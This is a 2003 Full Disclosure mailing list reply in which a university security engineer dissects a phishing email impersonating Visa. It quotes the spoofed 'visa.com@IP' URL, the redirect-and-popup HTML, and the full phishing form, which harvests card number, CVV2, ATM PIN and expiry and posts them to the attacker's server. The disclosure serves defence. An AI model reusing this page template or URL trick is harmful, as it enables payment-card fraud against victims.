Full Disclosure mailing list archives
Re: visa XSS?
From: Gary Flynn <flynngn () jmu edu>
Date: Tue, 23 Dec 2003 09:29:53 -0500
Mauro Flores wrote:
I receive this mail today, the funny stuff is that when you click on the link, you execute: http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&StateLevel=GetFrom@64.21.80.2/~gotier/verified_by_visa.htm I don't have a Visa card and I don't like that 64.21.80.2 which is not a Visa IP, AFAIK. Anyone else receive it??
Yeah. We just got one here. I missed the first part of this thread so I don't know if I'm repeating stuff. The original email came from an address registered in Korea. Although the present web site redirects to the VISA site, if you look at the source you'll find: <HTML><HEAD> <TITLE>Secure with Visa</TITLE> <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><meta http-equiv='refresh' content='0; url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/personal/secure_with_visa/index.html'>
<BODY> <script language="JavaScript"> <!-- // alert("popali"); window.name="spec"; window.open("http://64.21.80.2/~gotier/r.php", 'Visa', "resizable=no,scrollbars=no,width=425,height=198"); // window.focus(); //--> </script> </BODY></HTML> And that r.php is a phish: Please, enter your data info!<html> <head> <title>Enter your data</title> </head> <body> <br> <form method=post action=http://64.21.80.2/~gotier/r.php> Credit Card No. <input type=text name=cc value=''><br> CVV2 <input type=text name=cvv2 value=''><br> PIN-ATM CODE: <input type=text name=pin value=''><br> Expiration Date: month : <select name=month> <option value=01>01 <option value=02>02 <option value=03>03 <option value=04>04 <option value=05>05 <option value=06>06 <option value=07>07 <option value=08>08 <option value=09>09 <option value=10>10 <option value=11>11 <option value=12>12 </select> year : <select name=year> <option value=2003>2003 <option value=2004>2004 <option value=2005>2005 <option value=2006>2006 <option value=2007>2007 <option value=2008>2008 <option value=2009>2009 <option value=2010>2010 <option value=2011>2011 <option value=2012>2012 </select> <br><br> <input type=submit value='Send'); </form> </body> </html> -- Gary Flynn Security Engineer - Technical Services James Madison University _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- visa XSS? Mauro Flores (Dec 23)
- Re: visa XSS? Mauro Flores (Dec 23)
- Re: visa XSS? jan . muenther (Dec 23)
- Re: visa XSS? Mauro Flores (Dec 23)
- Re: visa XSS? Adam Hunt (Dec 23)
- Re: visa XSS? jan . muenther (Dec 23)
- Re: visa XSS? Gary Flynn (Dec 23)
- RE: visa XSS? lists (Dec 23)
- Re: visa XSS? Oliver Gobin (Dec 23)
- Re: visa XSS? William Warren (Dec 23)
- <Possible follow-ups>
- RE: visa XSS? Knarr, Joshua (Dec 23)
- Re: visa XSS? jan . muenther (Dec 23)
- RE: visa XSS? Knarr, Joshua (Dec 23)
- Re: visa XSS? Scott Anderson (Dec 23)
- RE: visa XSS? Bill Royds (Dec 23)
- Re: visa XSS? Adam Hunt (Dec 23)
- RE: visa XSS? Brown, James (Jim) (Dec 23)
(Thread continues...)
- Re: visa XSS? Mauro Flores (Dec 23)